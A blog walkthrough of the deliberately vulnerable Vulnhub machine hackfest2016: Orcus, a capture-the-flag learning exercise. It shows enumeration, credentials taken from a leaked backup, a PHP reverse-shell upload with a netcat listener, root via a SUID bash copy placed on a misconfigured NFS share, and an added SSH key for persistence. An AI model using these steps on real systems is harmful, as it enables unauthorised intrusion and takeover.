Still enjoying some days off from work because of Easter holiday. To fill my time even more, I decided to spend some time with the hackfest2016: Orcus game. The difficulty level on this one is rated hard, I expect it to be somewhat harder than both hackfest2016: Sedna and Quaoar game.

Description

From Vulnhub:

If youre stuck enumerate more! Seriously take each service running on the system and enumerate them more!

Goals: This machine is intended to take a lot of enumeration and understanding of Linux system.

There are 4 flags on this machine 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box 4. There is something on this box that is different from the others from this series (Quaoar and Sedna) find why its different.

Feedback: This is my third vulnerable machine, please give me feedback on how to improve ! @ViperBlackSkull on Twitter simon.nolet@hotmail.com

Special Thanks to madmantm for testing this machine

Service discovery

This game did not require hunting for its IP address since it is shown already at the login prompt. Cutting directly to service discovery:

Command
sudo nmap -p1-65535 -A -T4 -sS 192.168.110.18

Results:

Port Service Product Hostname
22 ssh OpenSSH
53 domain ISC BIND
80 http Apache httpd
110 pop3
111 rpcbind
139 netbios-ssn Samba smbd ORCUS
143 imap Dovecot imapd
443 ssh OpenSSH
445 netbios-ssn Samba smbd ORCUS
993 imap Dovecot imapd
995 pop3s
2049 nfs_acl
35118 mountd
40711 nlockmgr
43124 mountd
58413 mountd

Orcus has some more services than the other two games in this series. Appears the hint about enumerating each service is legit. Those mount daemons peaked my interest, amongst other interesting finds:

Port 80

Key Value
http-robots.txt 30 disallowed entries (15 shown)

smb-os-discovery

Key Value
OS Windows 6.1 (Samba 4.3.11-Ubuntu)
Computer name \x00
NetBIOS computer name ORCUS\x00
Workgroup WORKGROUP\x00
System time 2017-04-14T05:39:36-04:00

smb-security-mode

Key Value
account_used guest
authentication_level user
challenge_response supported
message_signing disabled (dangerous, but default)

Finding exported NFS directories

Finding out which NFS directories Orcus exports:

$ sudo apt-get update
$ sudo apt-get install nfs-common
$ /sbin/showmount -e 192.168.110.18

Orcus are exporting the /tmp directory.

Enumerating on port 80

$ dirb http://192.168.110.18

The most interesting findings (some have been left out):

Folder / item Comment
/phpmyadmin/ No version number found. Uses content-security-policy
/install/ Error message stating “Database is currently Off-line!”. Stems from Exponent CMS
/admin/ Blank page, comment in HTML: This is a backup taken from the backups
/backups/ Lists two files: SimplePHPQuiz-Backupz.tar.gz and ssh-creds.bak. Ssh-creds.bak gives HTTP 403 forbidden
/cron/ Lists out PHP files
/external/ Lists a bunch of external programs. Found interesting ExtPrograms.csv
/files/ Lists folders. Found interesting subfolder /uploads
/framework Found interesting file /conf/config.php.example
/tmp/ Lists folders. Could be related to other /tmp folder found
/xmlrpc.php Indicator of something, perhaps?

robots.txt

Disallow entries (just a section of it):

Folder / item Comment
/exponent.js.php JS loaded as PHP
/exponent.js2.php JS loaded as PHP
/exponent_php_setup.php Tosses notices: Use of undefined constant BASE – assumed ‘BASE’
/getswversion.php Return JSON
/login.php Error message stating “Database is currently Off-line!”. Stems from Exponent CMS
/site_rss.php Error message stating “Database is currently Off-line!”. Stems from Exponent CMS
/source_selector.php Yields Page “/var/www/html/themes/retrotheme/index.php” not readable.
/thumb.php Shows not found image
/ABOUT.md Related to Exponent Content Management System
/CHANGELOG.md Reveals Related to Exponent Content Management System Version 2.3.9
/CREDITS.md Related to Exponent Content Management System
/INSTALLATION.md Installation instructions
/LICENSE GPL license
/README.md Standard README file
/RELEASE.md Shows version numbers: ## 2.3.8 and v2.3.7
/files/ Same as previously found
/tmp/ Same as previously found

Flags

Excuse me for all the data listed before the meaty part. I somehow felt it was necessary. Moving on to the meatier part, flag hunting!

Flag 1

From all the data found above I drew the conclusion that targeting phpMyAdmin was pointless since I could not find its version number. Actually its not, but for the sake of this game it was. Anyway, I noticed there were some error messages about the database wasn’t operating. And, I also found a backup file. Looked at the backup file first:

$ wget http://192.168.11.18/backups/SimplePHPQuiz-Backupz.tar.gz
$ tar zxvf SimplePHPQuiz-Backupz.tar.gz
$ cd SimplePHPQuiz/
$ grep -Rni password *

Found this snippet in includes/db_conn.php:

//Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

Logging into phpMyAdmin using these credentials:

HF16O - PHPMyAdmin login
Logged into phpMyAdmin

Browsed through the available databases and there were some empty ones. I supposed some of these databases were real and their associated product had some sort of vulnerabilities I could exploit for getting shell. Ran each one through searchsploit. A couple of Blind SQL injection here and there popped up, but the product with most exploits recorded were Zenphoto. Its database showed up empty so I reckoned I needed to fill it! But first, finding out if Zenphoto is available (since it didn’t show up using dirb).

HF16O - Zenphoto setup
Installing Zenphoto

The setup went through using the dbuser:dbpassword credentials from earlier. At the last step of setup I created an admin:admin user. Afterwards I got redirected to login page (/zenphoto/zp-core/admin.php).

Once in I started getting acquainted with Zenphoto. Found a tab mentioning plugins and inside it I found a plugin that provided file handling for the upload/files tab (elFinder). Enabled it and found where I could use it.

HF16O - Uploaded test file
Uploading test PHP file

Uploaded a test PHP file and figured it got uploaded to /zenphoto/uploaded/. At that point I was set to prepare my trusty Shelly shell again.

Shell access

Preparing Shelly (on Parrot Linux):

$ cp /usr/share/webshells/php/php-reverse-shell.php shelly.php

Then I made sure to prep Shelly with my IP and listening port (4444). Next, I set up a listener using Netcat:

$ nc -lvp 4444

Then uploaded Shelly using elFinder. Activating Shelly was just as easy as going to /zenphoto/upload/shelly.php.

HF16O - Shell
Getting shell

The very first commands I ran after getting shell were:

$ whoami
$ whereis python
$ python -c 'import pty; pty.spawn("/bin/bash")'

Just like the Sedna game, the flag was hidden in /var/www/flag.txt: 868c889965b7ada547fae81f922e45c4

Flag 2

My first thought was Orcus could be vulnerable to Dirty COW. A quick uname -a revealed it running kernel 4.4.0-45-generic #66 which according to this post isn’t vulnerable. Tried some other exploits without luck. Considered this a dead end for exploits at the moment.

In the section named “Finding exported NFS directories” I found a /tmp directory exposed. Thinking now is the time to look more into it. Trying to mount it locally in Parrot:

$ sudo mkdir /mnt/orcus
$ sudo mount -t nfs 192.168.110.18:/tmp /mnt/orcus

Nothing much of value was found inside this folder. Pondering about the next logical step I started looking into permissions by creating a couple of files.

First I created an empty file using my regular local user. Doing a ls on the shell side showed the file being owned by 1000:1000. Doing the same maneuver using local root account showed the newly made file owned by root:root. So basically, in theory, I could just copy a shell from Orcus and set SUID? So I tried:

On Orcus shell:

$ cd /tmp
$ cp /bin/bash pwn

On Parrot machine:

$ sudo su
$ chown root:root pwn
$ chmod u+s pwn

Back in Orcus shell again:

$ ./pwn -p
HF16O - Root shell
Root shell and flag

Navigated to /root and found the flag: 807307b49314f822985d0410de7d8bfe

Googled this procedure and found this. Ahem. Nice.

Flag 3

According to the game description the third flag was a post exploitation flag. Not sure on this one, though. I did a some efforts to solve it by adding a makeshift SSH public key, adding it to Orcus roots authorized_keys file. Then logged in through SSH and looked around. Found nothing to keep me going.

Flag 4

Finding the fourth flag was quite funny. Started looking into the /home folder. Nothing in there, except for a hidden folder called .youwillfindnothinghere. Inside that one was just a text file (itoldyou) containing nothing. Moved on looking at /etc/passwd and /etc/shadow to find if there were any users set up with a home directory. My hypothesis was that if there’s a mismatch between /home and the definition, then there’s something fishy going on.

Using

$ cat /etc/passwd | grep home

I found that user Kippo was such a user. Googling if Kippo could be a kind of software, I found that it is a SSH honeypot. Going further finding where Kippo is installed:

$ whereis kippo

It lived in /etc/kippo. Looking at kippo.cfg I found a curious looking flag:

# Port to listen for incoming SSH connections.
# user:1:TH!SP4SSW0RDIS4Fl4G!
Advertisements